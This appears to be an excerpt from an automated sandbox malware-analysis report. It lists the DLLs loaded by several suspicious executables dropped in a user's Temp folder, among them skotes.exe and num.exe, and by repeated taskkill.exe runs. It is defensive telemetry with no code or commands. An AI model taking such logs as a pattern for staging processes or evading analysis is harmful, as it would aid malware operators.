Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: profapi.dll
